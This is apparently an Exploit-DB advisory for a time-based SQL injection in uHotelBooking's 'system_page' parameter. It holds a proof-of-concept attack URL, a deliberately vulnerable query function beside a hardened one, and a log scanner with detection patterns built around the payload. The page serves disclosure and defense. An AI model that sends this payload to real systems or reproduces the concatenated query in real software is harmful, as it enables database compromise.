Vendor: uHotelBooking
By: Ahmet Ümit BAYRAM
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: uHotelBooking
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE: N/A
CPE: a:hotel-booking-script:uhotelbooking
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
Year: 2019

uHotelBooking System – ‘system_page’ SQL Injection

uHotelBooking is a hotel management and online booking/reservation site script. The vulnerability exists because user-supplied input in the 'system_page' GET parameter of the 'index.php' script is not validated before it is used in a SQL query. A remote, unauthenticated attacker can send a specially crafted HTTP request to execute arbitrary SQL commands against the application's database.

Mitigation:

Input validation should be performed so that untrusted data is never used to construct SQL commands; the 'system_page' value should be checked against the expected format (a page identifier) and passed to the database as a bound parameter rather than concatenated into the query string.
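The following is an added illustration of the mitigation, not code from uHotelBooking or from the advisory author. It assumes a hypothetical 'system_pages' table keyed by an integer id (the real schema is not on the page) and uses an in-memory SQLite database as a stand-in. It contrasts the vulnerable string-concatenation pattern the advisory describes with a hardened lookup that allow-lists the parameter and binds it as data; the advisory's own 'system_page' value is used only to show that the hardened path rejects it before any query runs.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the application's page table (assumed schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE system_pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO system_pages VALUES (?, ?)",
                     [(1, "About"), (2, "Terms"), (3, "Contact")])
    return conn

# Vulnerable pattern (the defect the advisory describes): the raw GET value
# is concatenated into the SQL text, so a quote in the value changes the
# structure of the statement instead of being treated as data.
def lookup_page_vulnerable(conn, system_page):
    sql = "SELECT id, title FROM system_pages WHERE id = '" + system_page + "'"
    return conn.execute(sql).fetchall()

# Hardened version: (1) allow-list validation, because a page id is a small
# positive integer, and (2) a parameterized query, so whatever survives
# validation is still bound as a value rather than spliced into SQL text.
PAGE_ID_RE = re.compile(r"^[1-9][0-9]{0,5}$")

class InvalidParameter(ValueError):
    """Raised when system_page does not look like a page id."""

def lookup_page_safe(conn, system_page):
    if not PAGE_ID_RE.fullmatch(system_page):
        raise InvalidParameter("system_page must be a positive integer")
    return conn.execute("SELECT id, title FROM system_pages WHERE id = ?",
                        (int(system_page),)).fetchall()

# Hypothetical request handler: takes the raw query string of index.php
# (parse_qs percent-decodes it, e.g. %2C -> ',') and routes it to the safe lookup.
def handle_request(conn, query_string):
    params = parse_qs(query_string)
    value = params.get("system_page", [""])[0]
    return lookup_page_safe(conn, value)

if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, "page=3&system_page=2"))
    try:
        handle_request(db, "page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z")
    except InvalidParameter as exc:
        print("rejected:", exc)
```

With the vulnerable function, the advisory's value alters the statement (on SQLite it simply fails to parse; on MySQL it evaluates the injected expression); with the hardened function, the same value never reaches the database because it fails the allow-list check, and a value that passes the check is bound with a placeholder.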

Exploit-DB raw data:

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://localhost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
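For defenders, the request pattern above is easy to spot in web server logs: 'system_page' should only ever be numeric, and the time-based probe carries recognisable MySQL expressions. The scanner below is an added example (not part of the advisory) that runs over constructed Apache combined-format log lines; it decodes each query-string parameter and flags requests whose 'system_page' value is non-numeric or contains the time-delay indicators seen in the PoC. The log lines and IP addresses are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Mar/2019:10:00:01 +0000] "GET /index.php?page=3&system_page=2 HTTP/1.1" 200 5120
203.0.113.10 - - [21/Mar/2019:10:00:07 +0000] "GET /index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z HTTP/1.1" 200 5120
203.0.113.10 - - [21/Mar/2019:10:00:08 +0000] "GET /index.php?page=3&system_page=0%27XOR%28if%28now%28%29%3Dsysdate%28%29%2Csleep%285%29%2C0%29%29XOR%27Z HTTP/1.1" 200 5120
198.51.100.7 - - [21/Mar/2019:10:01:00 +0000] "GET /index.php?page=1&system_page=1 HTTP/1.1" 200 4096
"""

# client ip, timestamp, method, request target, status
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Indicators drawn from the PoC: a delay function call, the now()=sysdate()
# comparison used for the timing check, and a quote immediately followed by a
# boolean operator (the value breaks out of the string literal).
INDICATORS = [
    ("time-delay-function", re.compile(r"\bsleep\s*\(", re.I)),
    ("mysql-timing-compare", re.compile(r"now\(\)\s*=\s*sysdate\(\)", re.I)),
    ("quote-boolean-breakout", re.compile(r"'\s*(xor|or|and)\b", re.I)),
]

# Parameters that are expected to be purely numeric in this application.
NUMERIC_PARAMS = {"system_page", "page"}

def findings_for_line(line):
    """Return a dict describing the request and its indicator hits, or None."""
    m = REQ_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status = m.groups()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = []
    for name, values in params.items():
        for decoded in values:
            # parse_qs already percent-decodes once; a second pass catches
            # double-encoded values (a no-op when nothing is left to decode).
            val = unquote_plus(decoded)
            if name in NUMERIC_PARAMS and not val.isdigit():
                hits.append(("non-numeric-value", name))
            for label, rx in INDICATORS:
                if rx.search(val):
                    hits.append((label, name))
    return {"ip": ip, "time": ts, "status": status, "hits": hits}

def scan(log_text):
    """Return one alert per log line that has at least one indicator hit."""
    alerts = []
    for line in log_text.splitlines():
        f = findings_for_line(line)
        if f and f["hits"]:
            alerts.append(f)
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["time"], alert["ip"], sorted({h[0] for h in alert["hits"]}))
```

The non-numeric check is the highest-signal rule here: it needs no knowledge of the injection syntax and also catches variants that avoid the specific functions above. A response-time field, if the log format includes one, would add a second signal for time-based probes.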